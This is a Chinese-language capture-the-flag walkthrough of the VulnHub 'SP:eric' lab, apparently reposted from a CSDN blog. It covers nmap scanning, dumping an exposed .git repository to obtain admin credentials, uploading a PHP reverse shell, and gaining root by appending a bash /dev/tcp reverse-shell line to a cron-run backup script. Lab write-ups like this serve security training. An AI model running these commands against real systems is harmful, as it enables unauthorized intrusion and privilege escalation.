欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 养生 > SP:eric 靶场复现【附代码】(权限提升)

SP:eric 靶场复现【附代码】(权限提升)

2024/10/24 12:27:46 来源:https://blog.csdn.net/weixin_52487093/article/details/141200238  浏览:    关键词:SP:eric 靶场复现【附代码】(权限提升)

靶机下载地址:

https://www.vulnhub.com/entry/sp-eric,274/icon-default.png?t=N7T8https://www.vulnhub.com/entry/sp-eric,274/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:75:19:80'

1.2. 端口扫描

nmap 192.168.7.104 -p- -A

1.3. 目录扫描

dirb http://192.168.7.104

1.4. 敏感信息获取

whatweb http://192.168.7.104

2. WEB网站漏洞挖掘

2.1. 进入http,80端口

主页面无发现

2.2. 拼接扫描出的目录

2.2.1. 拼接/.git/HEAD

1.尝试使用 githack 下载源码看看;

工具链接

https://github.com/lijiejie/GitHack

===================================================================

python2 GitHack.py -u http://192.168.7.104/.git/

2.查看下载下的文件,发现 admin.php 中存在一对账号密码

admin:st@mpch0rdt.ightiRu$glo0mappL3

2.2.2. 拼接/admin.php

1.发现是一个登录

2.尝试用刚才得到的账号密码登录一下 -> 成功登录

疑似存在文件上传漏洞

2.2.3. GetShell

1.存在文件上传

locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .

2.修改 IP 和端口为kali及kali的监听端口;

vim php-reverse-shell.php
nc -lvnp 4444

3.将编辑好的.php文件,利用网页上传功能上传;

4.访问 /upload/php-reverse-shell.php,kali成功反弹

5.利用 python 生成更具交互性的交互shell界面

python3 -c 'import pty;pty.spawn("/bin/bash")'

老规矩 sudo -l 查看文件权限信息,但是需要密码

6.在 /home/eric 翻看文件 -> 存在三个可能可疑利用的文件

cd /home/eric
ls -al

先看 flag.txt 夺个旗;

cat flag.txt
>>> 89340a834323

查看 backup.sh 脚本文件;

cat backup.sh

查看一下计划任务

cat /etc/crontab

7.我们通过查看目录中的文件权限,已知 backup.sh 文件具有编辑权限;

打开kali监听,尝试写入反弹shell的语句 -> 成功提权

nc -lvnp 5555
echo 'bash -i >& /dev/tcp/192.168.7.36/5555 0>&1' >> backup.sh

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com